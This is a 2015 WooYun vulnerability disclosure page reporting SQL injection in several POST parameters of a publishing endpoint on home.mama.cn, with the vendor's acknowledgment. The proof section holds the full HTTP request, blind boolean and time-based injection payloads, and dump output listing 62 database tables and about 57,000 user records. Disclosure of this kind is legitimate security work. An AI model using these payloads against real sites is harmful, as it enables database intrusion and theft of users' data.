当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116080

漏洞标题:妈妈网某处多个注入点

相关厂商:妈妈网

漏洞作者: 路人甲

提交时间:2015-05-26 11:43

修复时间:2015-07-10 12:14

公开时间:2015-07-10 12:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-26: 细节已通知厂商并且等待厂商处理中
2015-05-26: 厂商已经确认,细节仅向厂商公开
2015-06-05: 细节向核心白帽子及相关领域专家公开
2015-06-15: 细节向普通白帽子公开
2015-06-25: 细节向实习白帽子公开
2015-07-10: 细节向公众公开

简要描述:

233

详细说明:

POST /index.php?a=PublishPromotion&d=sub&g=Building HTTP/1.1
Content-Length: 225
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: home.mama.cn
Cookie: ***********************8
Host: home.mama.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
address=e&brand=e&contact=e&grade=e&link=e&realname=e&title=e&type=43&rnd=0.2819324042648077
这几个参数都存在问题

漏洞证明:

---
Parameter: address (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: address=e' RLIKE (SELECT (CASE WHEN (4469=4469) THEN 0x65 ELSE 0x28 END)) AND 'ZayY'='ZayY&brand=e&contact=e&grade=e&link=e&realname=e&title=e&type=43&rnd=0.2819324042648077
    Type: AND/OR time-based blind
    Title: MySQL <= 5.0.11 OR time-based blind (heavy query)
    Payload: address=e' OR 9394=BENCHMARK(5000000,MD5(0x50706954)) AND 'yQSd'='yQSd&brand=e&contact=e&grade=e&link=e&realname=e&title=e&type=43&rnd=0.2819324042648077
---
web application technology: Nginx, PHP 5.3.27
back-end DBMS: MySQL >= 5.0.0
Database: home
[62 tables]
+------------------------------+
| cj_column_pic                |
| home_admin_user              |
| home_art                     |
| home_art2                    |
| home_art3                    |
| home_art_20131025            |
| home_art_20131107            |
| home_art_pics                |
| home_art_pics2               |
| home_art_pics3               |
| home_art_promotions          |
| home_art_promotions1         |
| home_art_promotions_20131025 |
| home_art_promotions_20131030 |
| home_block_type              |
| home_businessman             |
| home_businessman_130802      |
| home_businessman_fee         |
| home_businessman_log         |
| home_businessman_mobile      |
| home_businessman_type        |
| home_casephoto               |
| home_casephoto2              |
| home_casephoto_cj            |
| home_channel                 |
| home_channel_art             |
| home_channel_art_20131025    |
| home_collect                 |
| home_edit_block              |
| home_edit_history            |
| home_feedback                |
| home_forum_thread            |
| home_phone_message           |
| home_phone_message_set       |
| home_phone_pushtoken         |
| home_phone_send              |
| home_photopic                |
| home_pic                     |
| home_pic2                    |
| home_pic_130723              |
| home_pic_130725              |
| home_pic_cj                  |
| home_pic_cross_to_tc         |
| home_region                  |
| home_send_block              |
| home_send_item               |
| home_send_item2              |
| home_sessions                |
| home_short_message           |
| home_short_message_feedback  |
| home_short_message_log       |
| home_sort                    |
| home_supermarket             |
| home_supermarket_brand       |
| home_tenders                 |
| home_tenders_company         |
| home_tenders_jlog            |
| home_tenders_log             |
| home_tenders_materials       |
| home_tenders_style           |
| home_top_nav                 |
| home_user                    |
+------------------------------+
Database: home
+-----------+---------+
| Table     | Entries |
+-----------+---------+
| home_user | 57368   |
+-----------+---------+

修复方案:

check

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-05-26 12:13

厂商回复:

谢谢

最新状态:

暂无